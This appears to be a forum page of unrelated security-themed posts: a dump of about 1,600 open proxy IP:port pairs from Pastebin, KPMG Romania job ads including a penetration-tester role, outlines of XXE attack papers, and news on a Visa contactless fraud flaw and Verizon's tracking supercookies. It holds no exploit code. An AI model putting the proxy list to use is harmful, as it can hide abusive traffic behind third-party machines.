183.219.248.70:8123 183.219.249.61:8123 183.219.46.155:8123 183.219.5.241:8123 183.219.50.200:8123 183.219.6.122:8123 183.219.83.67:8123 183.219.85.151:8123 183.219.88.140:8123 183.219.89.69:8123 183.219.90.133:8123 183.219.91.24:8123 183.219.94.67:8123 183.220.194.59:8123 183.220.199.223:8123 183.220.240.15:8123 183.220.240.240:8123 183.220.241.218:8123 183.220.245.2:8123 183.220.246.160:8123 183.220.247.135:8123 183.220.247.243:8123 183.220.44.239:8123 183.220.45.139:8123 183.221.147.193:8123 183.221.160.29:8123 183.221.164.91:8123 183.221.174.192:8123 183.221.175.177:8123 183.221.186.167:8123 183.221.188.161:8123 183.221.191.187:8123 183.221.191.198:8123 183.221.191.240:8123 183.221.208.185:8123 183.222.152.197:8123 183.222.153.242:8123 183.222.154.162:8123 183.222.156.12:8123 183.222.156.51:8123 183.222.157.227:8123 183.222.158.10:8123 183.222.158.150:8123 183.222.159.250:8123 183.222.160.21:8123 183.222.161.78:8123 183.222.163.68:8123 183.222.171.236:8123 183.222.174.137:8123 183.222.176.113:8123 183.222.183.37:8123 183.222.255.144:8123 183.222.87.110:8123 183.222.87.239:8123 183.223.16.2:8123 183.223.171.241:8123 183.223.172.31:8123 183.223.173.175:8123 183.223.35.63:8123 183.224.1.30:80 183.224.12.76:80 183.224.12.81:80 183.227.210.73:8123 183.228.142.252:8123 183.228.142.78:8123 183.228.156.176:8123 183.228.176.207:8123 183.228.176.47:8123 183.228.177.3:8123 183.228.179.113:8123 183.228.180.85:8123 183.228.182.71:8123 183.228.200.133:8123 183.228.201.154:8123 183.228.205.64:8123 183.228.206.3:8123 183.228.209.120:8123 183.228.209.6:8123 183.228.210.248:8123 183.228.222.175:8123 183.228.238.59:8123 183.228.239.134:8123 183.228.239.70:8123 183.228.243.115:8123 183.228.243.147:8123 183.228.249.139:8123 183.228.251.7:8123 183.228.39.228:8123 183.228.39.246:8123 183.228.39.68:8123 183.228.40.4:8123 183.228.41.213:8123 183.228.42.183:8123 183.228.68.178:8123 183.228.78.93:8123 183.228.79.184:8123 183.228.88.130:8123 183.228.88.46:8123 183.230.53.153:8123 
183.247.235.21:8123 183.249.23.148:8123 183.249.33.202:8123 183.249.6.133:80 183.57.78.62:8085 183.82.131.183:9064 183.83.108.60:9064 183.83.87.150:9064 183.89.78.116:8080 183.89.92.242:3128 184.105.18.253:8085 186.136.180.233:8080 186.89.130.234:9064 186.89.253.70:8080 186.89.65.213:8080 186.89.90.103:9064 186.90.78.254:9064 186.90.79.190:8080 186.91.95.149:9064 186.92.112.11:8080 186.92.155.55:9064 186.92.163.128:9064 186.92.173.190:9064 186.92.198.65:8080 186.92.199.190:8080 186.92.199.246:8080 186.92.228.141:9064 186.92.4.99:9064 186.92.45.190:8080 186.93.111.198:8080 186.93.153.85:8080 186.93.19.34:9064 186.93.2.196:9064 186.93.203.224:8080 186.93.231.228:8080 186.93.30.229:9064 186.94.127.192:8080 186.94.143.54:8080 186.94.146.142:9064 186.94.190.53:9064 186.94.2.57:8080 186.94.224.8:9064 186.94.225.192:9064 186.94.241.175:9064 186.94.253.225:9064 186.94.34.32:8080 186.94.35.87:9064 186.94.59.50:8080 186.94.64.115:8080 186.95.228.109:8080 186.95.243.202:9064 186.95.47.172:8080 186.95.50.205:9064 186.96.253.146:8080 187.120.34.166:3128 187.120.34.246:3128 187.120.34.25:3128 187.120.34.66:3128 187.72.134.241:3128 187.73.175.23:3128 189.84.176.185:3128 189.85.20.189:8080 190.0.48.2:8080 190.128.238.38:8080 190.153.116.27:8080 190.183.115.148:9064 190.183.177.235:9064 190.184.144.174:8080 190.184.144.78:8080 190.198.134.200:9064 190.198.154.226:8080 190.198.178.228:9064 190.198.180.106:9064 190.198.2.148:8080 190.198.216.80:8080 190.198.227.114:8080 190.198.254.141:8080 190.198.27.169:9064 190.198.27.97:9064 190.198.80.240:8080 190.199.183.246:9064 190.199.218.90:8080 190.199.67.95:8080 190.199.71.123:9064 190.200.155.27:8080 190.200.157.6:8080 190.200.16.228:9064 190.200.185.216:9064 190.200.189.115:9064 190.200.217.151:8080 190.201.142.135:8080 190.201.154.134:9064 190.201.165.152:9064 190.201.167.141:9064 190.201.170.94:9064 190.201.216.72:9064 190.201.40.238:9064 190.202.194.152:9064 190.202.244.165:8080 190.203.132.250:8080 190.203.201.100:8080 
190.203.239.67:8080 190.203.43.97:9064 190.204.1.2:9064 190.204.101.28:8080 190.204.122.129:8080 190.204.160.33:8080 190.204.168.253:8080 190.204.173.227:8080 190.204.242.235:8080 190.204.255.232:8080 190.204.26.213:9064 190.204.29.122:9064 190.204.55.110:9064 190.204.67.235:9064 190.205.123.55:8080 190.205.127.253:8080 190.205.192.9:8080 190.205.193.204:9064 190.205.196.77:9064 190.205.202.104:8080 190.205.220.126:8080 190.205.225.226:9064 190.207.149.102:8080 190.207.185.119:8080 190.207.200.185:8080 190.207.203.228:8080 190.207.208.168:9064 190.207.219.164:3128 190.207.228.97:9064 190.207.24.170:8080 190.207.253.107:9064 190.207.34.65:8080 190.207.56.83:9064 190.207.63.222:8080 190.217.215.194:9064 190.36.11.61:9064 190.36.143.123:8080 190.36.152.23:9064 190.36.154.15:8080 190.36.214.44:8080 190.36.72.1:9064 190.36.8.130:9064 190.36.8.26:9064 190.37.122.118:8080 190.37.122.163:8080 190.37.164.82:9064 190.37.165.72:9064 190.37.211.186:9064 190.37.224.236:8080 190.37.225.158:8080 190.37.231.178:8080 190.37.232.155:8080 190.37.239.21:9064 190.37.34.104:8080 190.37.48.121:8080 190.37.57.100:8080 190.37.77.86:8080 190.38.122.59:9064 190.38.123.239:9064 190.38.157.98:9064 190.38.178.28:8080 190.38.218.87:8080 190.38.29.145:9064 190.38.44.178:8080 190.38.45.9:8080 190.38.5.195:8080 190.38.54.32:8080 190.38.64.85:8080 190.38.68.219:8080 190.38.88.204:9064 190.38.94.86:8080 190.38.97.254:9064 190.39.105.142:9064 190.39.107.127:8080 190.39.169.183:9064 190.39.252.172:9064 190.39.67.73:8080 190.39.68.174:8080 190.39.75.247:8080 190.39.94.169:8080 190.40.123.36:8080 190.44.73.74:9064 190.52.32.126:3128 190.72.120.118:9064 190.72.15.242:8080 190.72.15.87:8080 190.72.153.86:8080 190.72.157.20:9064 190.72.191.194:9064 190.72.225.106:8080 190.72.6.206:9064 190.73.105.81:8080 190.73.11.143:8080 190.73.185.34:9064 190.73.216.119:8080 190.73.233.182:8080 190.73.252.90:9064 190.73.96.171:8080 190.74.146.224:8080 190.74.162.46:9064 190.74.165.158:8080 190.74.165.207:9064 
190.74.168.149:8080 190.74.180.79:8080 190.74.186.36:9064 190.74.199.171:8080 190.74.200.117:9064 190.74.202.231:9064 190.74.203.4:8080 190.74.90.109:9064 190.75.137.251:9064 190.75.139.217:8080 190.75.139.61:9064 190.75.194.53:8080 190.75.206.79:9064 190.75.211.152:9064 190.75.238.227:9064 190.75.239.216:9064 190.75.33.152:9064 190.75.35.65:8080 190.77.219.159:8080 190.77.221.130:9064 190.77.230.141:8080 190.77.245.52:9064 190.78.151.16:9064 190.78.178.185:9064 190.78.178.6:8080 190.78.23.90:8080 190.78.24.108:9064 190.78.98.178:9064 190.78.99.152:9064 190.79.105.115:8080 190.79.107.130:9064 190.79.151.178:8080 190.79.222.12:9064 190.79.6.136:9064 190.94.202.13:9064 190.94.216.250:9064 190.98.205.107:80 191.105.121.101:9064 191.240.57.212:8080 191.241.76.52:8080 191.37.238.135:8080 191.37.238.169:8080 192.163.255.175:3128 192.3.104.245:80 192.3.162.138:3128 192.99.3.129:3128 194.125.224.125:3128 194.126.140.247:80 194.186.43.22:3128 194.213.60.227:8585 194.247.12.106:3128 194.247.165.118:8080 194.44.153.89:3128 194.8.248.22:3128 195.114.125.81:8080 195.154.77.104:3128 198.251.67.194:8080 198.46.103.108:80 198.52.217.44:7808 198.52.217.44:8089 198.71.193.192:80 198.71.213.94:80 199.167.228.36:80 199.200.120.140:8089 199.200.120.36:7808 199.200.120.37:7808 200.109.137.60:8080 200.112.211.16:8080 200.124.112.24:3128 200.143.198.83:3128 200.174.182.103:8080 200.192.248.94:8080 200.223.4.138:8081 200.242.145.3:3128 200.69.206.157:8080 200.90.86.38:8080 200.93.69.164:9064 201.208.204.219:9064 201.208.30.218:8080 201.208.37.148:8080 201.209.198.47:9064 201.209.220.178:8080 201.209.233.75:9064 201.209.240.8:9064 201.209.31.248:8080 201.209.47.77:9064 201.209.53.85:9064 201.210.222.209:9064 201.210.233.167:8080 201.210.249.226:9064 201.210.69.228:8080 201.211.109.142:8080 201.211.120.56:8080 201.211.129.156:9064 201.22.217.194:8080 201.221.131.62:8080 201.221.131.92:8080 201.221.132.69:3128 201.221.133.182:8080 201.238.203.66:3128 201.240.215.147:3128 201.242.185.129:8080 
201.242.80.177:8080 201.242.93.133:9064 201.242.93.177:8080 201.243.104.100:9064 201.243.111.111:9064 201.243.126.125:8080 201.243.16.66:8080 201.243.175.209:9064 201.243.207.40:9064 201.243.96.183:8080 201.243.96.251:8080 201.248.18.112:8080 201.248.9.40:9064 201.55.143.1:3128 202.103.150.70:8088 202.108.50.75:80 202.109.163.75:8085 202.112.114.27:3128 202.117.1.122:8080 202.120.188.104:80 202.133.104.106:80 202.133.104.106:8080 202.141.225.126:8080 202.152.6.10:80 202.152.6.10:8080 202.152.61.44:8080 202.169.225.204:80 202.169.225.204:8080 202.171.253.134:80 202.171.253.135:80 202.171.253.72:80 202.171.253.84:85 202.171.253.84:86 202.29.238.242:3128 202.53.170.134:8080 202.77.115.71:54321 202.78.206.83:8080 202.91.73.30:8080 202.99.172.244:3128 203.128.71.247:8080 203.151.21.184:3128 203.176.136.66:8080 203.195.132.244:3128 203.202.250.98:3128 203.73.233.144:8088 203.81.67.86:8080 207.108.136.68:443 209.150.233.83:80 210.101.131.232:8080 210.13.105.23:8080 210.140.155.65:80 210.186.158.210:9064 210.209.72.236:80 210.245.20.170:80 210.65.10.76:3128 210.70.253.27:3128 210.73.218.136:3128 210.82.92.77:3128 211.138.121.37:80 211.138.121.37:81 211.138.121.37:82 211.138.121.37:83 211.138.121.37:84 211.138.121.38:80 211.138.121.38:81 211.138.121.38:82 211.138.121.38:83 211.138.60.16:80 211.138.60.18:80 211.139.45.22:8123 211.143.146.239:80 211.143.146.239:82 211.143.146.239:83 211.143.146.239:843 211.155.230.38:808 211.166.8.27:80 212.156.157.86:8080 212.158.155.22:8080 212.200.131.83:80 212.200.131.83:8080 216.120.236.190:3128 217.12.215.22:3128 218.108.232.99:80 218.166.101.107:8088 218.173.47.80:9064 218.173.73.10:9064 218.201.21.142:80 218.201.21.145:80 218.201.21.148:80 218.201.21.153:80 218.201.38.49:80 218.203.13.169:80 218.203.13.169:81 218.203.13.169:82 218.203.13.169:83 218.203.13.169:84 218.203.13.172:80 218.203.13.173:80 218.203.13.175:80 218.203.13.176:80 218.203.13.177:80 218.204.120.37:8123 218.204.156.111:8123 218.204.159.57:8123 218.206.83.89:80 
218.207.10.178:8123 218.207.17.163:8123 218.207.172.236:80 218.207.172.237:80 218.207.51.19:8123 218.207.52.55:8123 218.207.55.162:8123 218.26.13.155:63000 218.27.136.169:8085 218.28.96.39:3128 218.29.155.198:9999 218.29.90.30:9999 218.75.205.124:9999 218.75.205.57:9999 219.93.183.106:8080 220.129.173.150:9064 220.136.166.222:9064 220.173.235.202:9999 220.231.32.195:3128 221.0.182.5:808 221.172.143.166:9000 221.176.14.72:80 221.178.119.219:8123 221.178.119.233:8123 221.178.121.198:8123 221.178.124.80:8123 221.178.127.170:8123 221.178.24.55:8123 221.178.28.215:8123 221.178.29.169:8123 221.178.30.200:8123 221.178.30.253:8123 221.178.30.30:8123 221.178.32.109:8123 221.178.53.85:8123 221.178.54.134:8123 221.178.55.55:8123 221.178.78.102:8123 221.178.83.50:8123 221.178.84.49:8123 221.178.86.157:8123 221.178.86.224:8123 221.178.98.82:8123 221.178.99.130:8123 221.180.130.48:80 221.180.130.49:80 221.180.130.50:80 221.180.130.51:80 221.180.147.30:80 221.180.147.30:81 221.180.147.30:83 221.180.147.30:86 221.182.110.141:8123 221.182.62.114:9999 221.182.62.32:8123 221.182.74.154:8123 221.182.74.46:8123 221.182.75.186:8123 221.182.75.205:8123 221.182.75.80:8123 221.183.16.219:80 221.231.135.149:80 221.5.69.51:80 221.5.69.51:8000 222.124.149.178:3128 222.129.205.199:9000 222.132.29.10:8080 222.246.232.55:80 222.35.17.177:8080 222.50.14.100:9000 222.66.97.75:8080 222.85.1.123:8118 222.85.103.192:81 222.85.149.4:3128 222.88.236.236:81 222.88.236.236:82 222.88.236.236:83 222.88.242.213:9999 223.252.33.209:23684 223.66.80.235:8123 223.67.148.169:8123 223.82.14.151:8123 223.82.169.151:8123 223.82.171.161:8123 223.82.171.176:8123 223.82.203.120:8123 223.82.204.182:8123 223.82.217.177:8123 223.82.217.28:8123 223.82.218.166:8123 223.82.37.67:8123 223.82.39.59:8123 223.82.42.148:8123 223.82.67.22:8123 223.82.74.214:8123 223.83.136.97:8123 223.83.137.26:8123 223.83.141.95:8123 223.83.201.241:8123 223.83.206.200:8123 223.84.130.224:8123 223.84.131.211:8123 223.84.133.12:8123 
223.84.138.112:8123 223.84.143.179:8123 223.84.145.42:8123 223.84.147.193:8123 223.84.160.160:8123 223.84.19.45:8123 223.84.195.89:8123 223.84.206.174:8123 223.84.206.44:8123 223.84.216.238:8123 223.84.221.130:8123 223.84.229.77:8123 223.84.232.62:8123 223.84.82.206:8123 223.86.122.39:8123 223.86.127.219:8123 223.86.127.27:8123 223.86.127.57:8123 223.86.171.47:8123 223.86.215.67:8123 223.86.216.148:8123 223.86.217.177:8123 223.86.217.37:8123 223.86.218.118:8123 223.86.218.22:8123 223.86.219.193:8123 223.86.223.179:8123 223.86.3.124:8123 223.86.32.6:8123 223.86.40.248:8123 223.86.6.44:8123 223.86.66.238:8123 223.86.67.105:8123 223.86.67.61:8123 223.86.7.110:8123 223.86.7.221:8123 223.86.7.51:8123 223.86.7.63:8123 223.86.72.148:8123 223.86.9.83:8123 223.87.108.106:8123 223.87.114.209:8123 223.87.159.77:8123 223.87.183.43:8123 223.87.62.203:8123 223.87.76.128:8123 223.99.188.73:8090 223.99.188.74:8090 23.226.131.196:8080 23.232.196.1:80 23.232.196.10:80 23.232.196.13:80 23.232.196.14:80 23.232.196.2:80 23.232.196.4:80 27.109.140.205:80 27.115.18.18:8080 27.131.190.66:8080 27.131.47.131:8080 27.145.145.105:8080 27.187.155.71:8088 27.3.142.237:9064 27.5.192.190:9064 27.50.128.242:88 31.15.48.12:80 31.3.246.183:7080 31.7.232.102:3128 36.224.219.91:8088 36.226.118.20:9064 36.227.225.141:8088 36.227.4.45:8088 36.231.127.68:8088 36.250.69.4:80 36.250.74.87:80 36.250.74.88:80 36.73.141.145:31281 36.74.37.6:8888 36.78.128.251:31281 36.80.35.69:8080 37.131.208.141:8080 37.157.192.146:3128 37.236.167.250:80 37.239.46.10:80 37.239.46.18:80 37.239.46.50:80 37.239.46.58:80 37.60.66.108:8080 37.60.66.109:8080 41.188.49.163:3128 41.73.230.39:8080 41.89.96.36:3128 42.117.3.73:3128 42.202.146.58:8080 42.62.61.245:80 46.32.231.84:80 49.113.241.95:8585 49.204.134.166:9064 49.204.176.99:9064 49.207.213.194:9064 49.207.217.125:9064 49.207.227.208:9064 49.207.29.74:9064 5.102.108.198:80 5.135.98.240:80 5.153.230.44:80 5.196.5.145:3128 58.146.102.176:9064 58.248.156.53:9999 
58.248.156.54:9999 58.248.80.61:9999 58.248.81.11:9999 58.251.78.71:8088 58.252.0.25:9999 58.253.238.242:80 58.253.238.243:80 58.42.236.241:80 58.64.130.14:8080 58.64.130.18:8080 58.96.168.83:9999 59.115.10.115:9064 59.12.160.20:3128 59.151.103.14:80 59.151.103.15:80 59.188.252.249:3128 59.46.72.245:8080 60.12.11.60:808 60.12.69.110:80 60.190.138.151:80 60.207.166.152:80 60.21.132.218:63000 60.213.189.170:3988 60.214.67.86:9999 60.221.253.204:80 60.55.43.74:80 61.133.51.6:9999 61.149.182.102:8080 61.155.169.11:808 61.156.35.2:3128 61.158.173.188:9999 61.163.165.250:9999 61.172.44.138:9999 61.19.114.178:8080 61.19.121.121:3128 61.19.121.154:3128 61.19.30.198:8080 61.19.42.244:8080 61.19.69.252:8080 61.219.16.16:8888 61.223.145.222:9064 61.227.218.171:3128 61.228.146.138:8088 61.228.233.132:9064 61.230.107.88:8088 61.230.21.131:8088 61.234.123.64:8080 61.58.84.209:8088 62.103.107.9:80 62.108.122.173:3128 64.31.22.131:7808 64.31.22.131:8089 64.74.219.86:80 65.49.14.147:3080 65.49.14.147:3128 66.10.94.36:80 66.10.94.36:8080 66.135.118.156:80 66.162.208.10:3128 66.192.33.78:3128 66.192.33.78:8080 67.148.11.168:443 74.253.21.252:8080 74.50.126.248:7808 74.50.126.248:8089 74.50.126.249:7808 74.50.126.249:8089 75.133.69.131:8080 76.76.105.124:3128 78.107.199.67:8080 79.106.108.139:8080 80.82.69.72:3128 83.246.129.250:3128 88.156.27.199:8080 88.198.24.108:3128 89.191.131.243:8080 89.232.139.253:80 89.249.207.65:3128 89.46.101.122:7808 89.46.101.122:8089 91.218.230.152:3128 91.227.93.20:80 91.238.29.192:9999 93.115.8.229:7808 93.115.8.229:8089 93.188.166.85:80 93.85.92.109:3128 93.87.74.182:8080 94.180.115.232:80 94.198.38.20:8080 94.247.174.117:18080 95.167.39.34:8080 95.65.22.132:3128 95.86.133.141:3128 98.103.146.102:80
Source: 08-11-14 | Fast Proxy Server List (1655) - Pastebin.com
-
Company: KPMG - on my team.

IMPORTANT! Thank you for your CV! In order to make sure your application will be taken into consideration, please apply also to: Career news & insights | KPMG | RO

Who are we?
KPMG is a global network of professional services firms providing Audit, Tax and Advisory services with an industry focus. We operate in 152 countries and have more than 145,000 professionals working in member firms around the world. KPMG has been in Romania and Moldova since the early 90s. We now operate with 800 people from six offices in Bucharest, Cluj, Timisoara, Iasi, Constanta and Chisinau and we are one of the leading professional services firms in the Romanian and Moldovan markets.

What are we looking for?
An IT Security Consultant (Penetration Tester / Ethical Hacker) for our IT Advisory team.

Job profile:
• Conduct technical security assessments and information security projects which require expertise in one or more of the following areas: Penetration Testing / Ethical Hacking, Vulnerability Assessments and IT Security Audits;
• Identify and exploit technical vulnerabilities in clients' systems, assess the business risks of the technical vulnerabilities and communicate them to client personnel;
• Perform security configuration analysis for various operating systems, especially Windows and Linux / UNIX;
• This is a position in the Penetration Testers Team which requires quick learning and working with new technologies, tools and techniques.

Some typical projects that you will work on (depending on your expertise) are:
• Web application penetration testing: try to find vulnerabilities in web applications (e.g. Internet Banking, eCommerce websites, web portals, etc.) and report them to the clients. Try to exploit these vulnerabilities in order to prove their business impact.
• Internal network penetration testing: simulate a malicious person who already has access to the internal network of the customer (e.g. visitor, consultant, etc.). Starting only from simple network port access you will have to gain access to sensitive information from the client's internal network, gain Domain Admin access or reach other flags.
• Mobile application penetration testing: try to find vulnerabilities in mobile applications (Android, iOS, Windows Phone) and suggest corrective measures in order to improve their security.
• Other types of technical projects that will involve your imagination and out-of-the-box thinking may also occur.
• It is sometimes required to make demonstrations and presentations to clients.
• We encourage technical research and presenting our results at hacking conferences, local and international.

Specific requirements:
• Since IT Security is a multidisciplinary field, we are looking for a person who has a broader understanding of technical concepts from one or more of the following areas: web applications, system administration, networking, software development.
• In order to understand the technical level that we need, here are a few terms/concepts that we expect you to be familiar with: OWASP Top 10, HTTP protocol, SSL, SQL, JavaScript, buffer overflow, TCP/IP, DNS, wireshark, nmap, Linux shell commands, Kali and others.
• You also must be able to express your findings in very good technical and business English (oral and written).
• Other desired requirements are:
- Bachelor's degree in an IT related field;
- Hands-on experience in at least one of the following: security testing, web application development/testing, system administration, networking, software development;
- Work effectively either individually or as a member of a multi-skilled team;
- Professional discipline, accuracy, reliability and excellent analytic skills;
- Strong interpersonal skills, team spirit, resilience, flexibility, adaptability and self-motivation.

Will be considered a plus: certifications such as OSCP, OSCE, CEH, LPT, CCNA, MCSE.

Note: I can provide any kind of (non-confidential) information. PM me if you are interested.

Bestjobs: IT Security Consultant at S.C. KPMG ROMANIA SRL, BUCURESTI - BestJobs
-
Company: KPMG Romania (where I also work)

IMPORTANT! Thank you for your CV! In order to make sure your application will be taken into consideration, please apply also to: Career news & insights | KPMG | RO

Who are we?
KPMG is a global network of professional services firms providing Audit, Tax and Advisory services with an industry focus. We operate in 152 countries and have more than 145,000 professionals working in member firms around the world. KPMG has been in Romania and Moldova since the early 90s. We now operate with 800 people from six offices in Bucharest, Cluj, Timisoara, Iasi, Constanta and Chisinau and we are one of the leading professional services firms in the Romanian and Moldovan markets.

What are we looking for?
An Application Developer for our IT Advisory team. The job's daily activities include design, development, maintenance and integration of business applications. C# will be the usual programming language, Visual Studio the development environment and Microsoft SQL Server the data storage engine.

Responsibilities:
• Building new systems with ASP.MVC, ASP.NET, SQL Server 2008/2012, Entity Framework and Linq;
• Developing new functionality on our existing software products;
• Leading/mentoring IT staff and sharing knowledge through knowledge-sharing presentations;
• Participating in a small, experienced, energetic development team.

Requirements:
• Solid knowledge of C# and .NET Framework, OOP concepts, algorithms and data structures - minimum 4 years of experience;
• Web development experience (ASP.MVC, ASP.NET, JavaScript, AJAX, CSS, JSON, JQUERY) - minimum 4 years of experience;
• Very good knowledge of T-SQL and relational database design - minimum 4 years of experience;
• Graduate of Computer Science/Cybernetics/Information Technology/Electronics College;
• Fluent in English;
• Ability and willingness to work as part of a team of developers;
• Learning oriented person.

Additional advantage:
• Active Reports, SQL Reporting Services;
• Java & Install Shield knowledge;
• Active Directory knowledge;
• Knowledge of WCF Web Services, WCF Data Services.

Note: I can provide more information. PM me if you are interested.

Bestjobs: Application Developer at S.C. KPMG ROMANIA SRL, BUCURESTI - BestJobs
-
Company: KPMG Romania (where I also work)

IMPORTANT! Thank you for your CV! In order to make sure your application will be taken into consideration, please apply also to: Career news & insights | KPMG | RO

Who are we?
KPMG is a global network of professional services firms providing Audit, Tax and Advisory services with an industry focus. We operate in 152 countries and have more than 145,000 professionals working in member firms around the world. KPMG has been in Romania and Moldova since the early 90s. We now operate with 800 people from six offices in Bucharest, Cluj, Timisoara, Iasi, Constanta and Chisinau and we are one of the leading professional services firms in the Romanian and Moldovan markets.

What are we looking for?
A team member for our IT Department. Someone with good inter-personal skills who is able to communicate easily with KPMG staff, based on his proficiency in English. The candidate should be a strong team player and possess very good time management and task follow-up skills. Moreover, he should demonstrate rigor in his daily routine while treating all staff requirements with solicitude.

Job objective
The overall job objective is to create an interface between the IT Department and end users in order to increase the responsiveness of the IT team to daily and ordinary assistance demands coming from staff. Provide support to staff on all company supported applications. Troubleshoot computer problems, determine the source, and advise on appropriate action.

Responsibilities:
• Respond to requests for technical assistance in person, via phone, and email;
• Assist end-users in all IT applications and equipment related issues;
• Diagnose and resolve technical hardware and software issues, and document resolutions for future reference;
• Determine the source of computer problems (hardware, software, user access, etc.) and advise staff on appropriate action;
• Serve as liaison between staff and the IT department to resolve issues;
• Perform hardware and software installations;
• Follow standard help desk & incident management procedures: log all help desk interactions, redirect problems to the appropriate resource, identify and escalate situations requiring urgent attention, track and route problems and requests and document resolutions, prepare activity reports, stay current with system information, changes and updates;
• Ensure, as part of the IT team, the proper operation of all IT and Telecommunication items / equipment;
• Take part in the implementation of new IT applications and/or management information systems;
• Contribute to the development, improvement and implementation of new IT policies within the Firm and monitor staff compliance;
• Provide full end-user support in using customized specific IT applications;
• Deliver on the spot and / or regular IT assistance to staff.

Required skills:
• University degree in Information Technology or related sciences;
• At least 2 years prior work experience as a member of an IT team;
• Relevant work experience in hardware, software & communication troubleshooting;
• Knowledge of Windows 7/8, Office Application - Microsoft certification desirable.

Performance standard requirements: Core Competencies defined for Infrastructure staff (link)

Note: I can provide more information. PM me if interested.

Bestjobs: IT Service Desk at S.C. KPMG ROMANIA SRL, BUCURESTI - BestJobs
-
Company: KPMG Romania (where I also work)

Candidate profile:
Participate in IT advisory projects together with other team members; assist the in-charge and the manager during the fieldwork and project documentation; perform various project related tasks in accordance with the instructions of the in-charge and the manager; document the information in dedicated working papers as per KPMG methodology; assume indicated roles in projects according to your position; liaise with the clients to understand, obtain and assess specific information.

Specific requirements:
Bachelor degree in Economics, Information Systems Management, Cybernetics, Information Technology or related; Information Technology knowledgeable and passionate; ability to communicate accurately and efficiently in English, both verbally and in writing; flexible in working independently or in a team, as required by the tasks assigned; ability to understand and meet deadlines and to perform work under pressure; previous experience in a consulting company would be a plus; available for business travel; drive for developing professionally and building long term relationships with clients and colleagues.

Note: I can provide more information. PM me if anyone is interested.

Bestjobs: IT ADVISORY JUNIOR / INTERN at S.C. KPMG ROMANIA SRL, BUCURESTI - BestJobs
-
XML Schema, DTD, and Entity Attacks
May 19, 2014, Version 1.0
Timothy D. Morgan (@ecbftw)
Omar Al Ibrahim (oalibrahim@vsecurity.com)

Contents
Abstract
Introduction
- Motivation
- Background
- Prior Art
General Techniques
- Resource Inclusion via External Entities
- URL Invocation
- Parameter Entities
- External Resource Inclusion via XInclude Support
- Denial of Service Attacks
Implementation-Specific Techniques and Limitations
- Java / Xerces
- C# / .NET
- Expat
- Libxml2
- PHP
- Python
- Ruby
Recommendations For Developers
- Java / Xerces
- C# / .NET
- Expat
- Libxml2
- PHP
- Python
- Ruby
Recommendations For XML Library Implementors
Future Work
Acknowledgements
References

Download: http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf
-
CONTENT
Introduction
It's all about entities
Parameter entities
Validity and well-formedness
XXE Data Retrieval
Peculiar features of attacks on various parsers
References
About Positive Technologies

Download: https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf
-
How To Steal $999,999.99 From Visa Contactless Cards Without PIN.
Posted on November 6, 2014 by Waqas

Findings from a newly submitted research paper at Newcastle University will shock many of the people using the VISA contactless payment system. The amazing aspect of the research is that it doesn't involve any kind of hack; it's just a trick that can force contactless payment card owners to pay much more than they were willing to spend. Such an attack is a special type of Man in the Middle (MitM) attack. So, fasten your seat belts and get ready because something quite astonishing is about to be unraveled!

Let's first look at how the contactless bank payment system works. Contactless bank payment (which relies on near field communication technology) allows its users to pay with a wave of the card at the payment terminal (the card must be within 5cm of the terminal to work). The system is widely used at a number of places (London's Oyster and Sydney's Opal are examples) to charge the users instantaneously. When a user waves the card through the electromagnetic field, an antenna inside the card produces a small current and this wakes up the chip inside the card, which reads the data, makes the calculations and provides the reply.

Now you must be wondering what's wrong with the system. Really, there is a massive loophole in the system; let me unravel it. Consider a rigged payment terminal put into place that detects your card for payment. Though no PIN is required only for small transactions (less than $20), serious cash can be made if the machine can trick a large number of cards each day. It's like a magnetic field that is always looking to attract different types of materials.

When the researchers dug deeper into this problem, they found a number of concerns over the usage of cards and the related policies:
1. When using VISA cards for foreign payments, the restriction of entering a PIN for payments over 20 pounds is omitted.
2. When paying in foreign currency, the official restriction in terms of local currency for the payment is omitted, and the card can be charged an amount as large as 8 figures. So, if you are in the UK your card can be charged up to US$999,999.99 (not a bad deal for an ordinary thief).
3. When paying offline over 100 pounds in foreign currency, security for the payment is reduced and the card is committed to the transaction without even involving the bank. Though the researchers are not yet sure if transactions exceeding the available balance are allowed or not, once the transaction is made offline the thief can easily create a fake document to claim the money or show that the money belongs to him, and the real owner only gets updates once the transaction is processed.

Another concern that is not related to the usage of cards but to the terminals:
1. Terminals can even work as a spying tool, as many people use these NFC terminals to pass information to their smartphones offline, and if rigged these terminals can easily gather information from people's smartphones.

So, what should be done to stop this from becoming a reality? Well, the researchers have listed some important tips for the contactless payment system and its developers.

Tips for the developers:
1. Always require a PIN for foreign currencies.
2. Always require online transaction verification for foreign currencies.

Tips for technology users:
1. If you don't travel overseas regularly, ask your bank if it offers an option to prevent transactions in foreign currencies.
2. Keep your card in a wallet or cover that blocks electromagnetic radiation so it has to be taken out to be used.
3. Do your low value payments with cash, so you don't need contactless transactions enabled on your card at all.

Source: http://hackread.com/how-to-steal-million-from-visa-contactless-cards/
-
EFF: VPNs will crumble Verizon's creepy supercookie stalkers
Now that ad networks are jumping on the privacy vulnerability
By Iain Thomson, 6 Nov 2014

The Electronic Frontier Foundation says Verizon's silent supercookies, which always follow subscribers around the internet, are being abused by creepy advertisers to push targeted ads. The EFF says people should start using encrypted VPNs by default to claw back their privacy, because opting out of the system is not enough.

Two years ago Verizon started stamping a unique identifier token header (UIDH) on each website visit made by subscribers via its cellular data network. As the name suggests, the identifiers are unique to each person, allowing website owners to quietly build up profiles on people using these ID codes. These records of online behavior are valuable to advertisers, as they allow them to get an idea of which adverts to display to each person: someone tracked across cycling websites will end up being shown ads for new bikes, for example.

Verizon allows people to "opt out" of the system, meaning the telco won't allow advertisers to directly request and analyze your online wanderings, but the setting is mostly useless: every single HTTP request via its network is stamped with a UIDH regardless of the opt-out, and is thus visible to any web server one visits.

Now it appears that ad networks are using the UIDHs to monitor internet users without all that tiresome business of actually paying Verizon for the privilege, and since the system is baked in by the company there's very little people can do to stop them. Code has already appeared on Github (since removed) that would allow anyone with the right setup to track Verizon's identifier, and reports are surfacing that Twitter has also found a way to follow the telco's clients online using the UIDH information.

The UIDH system is also pernicious in that it bypasses the anti-tracking measures in iOS and Android that are designed to protect mobile users' privacy: these measures tackle web cookies, rather than the specific UIDH HTTP header.

"It is possible to build an opt-out system that would stop this, but it would take a considerable amount of work and the current systems just can't do it," EFF staff technologist Jacob Hoffman-Andrews told The Register.

Stamping a mandatory ID number on subscribers is such a nice idea that AT&T is also reportedly considering the same "feature" for its customers.

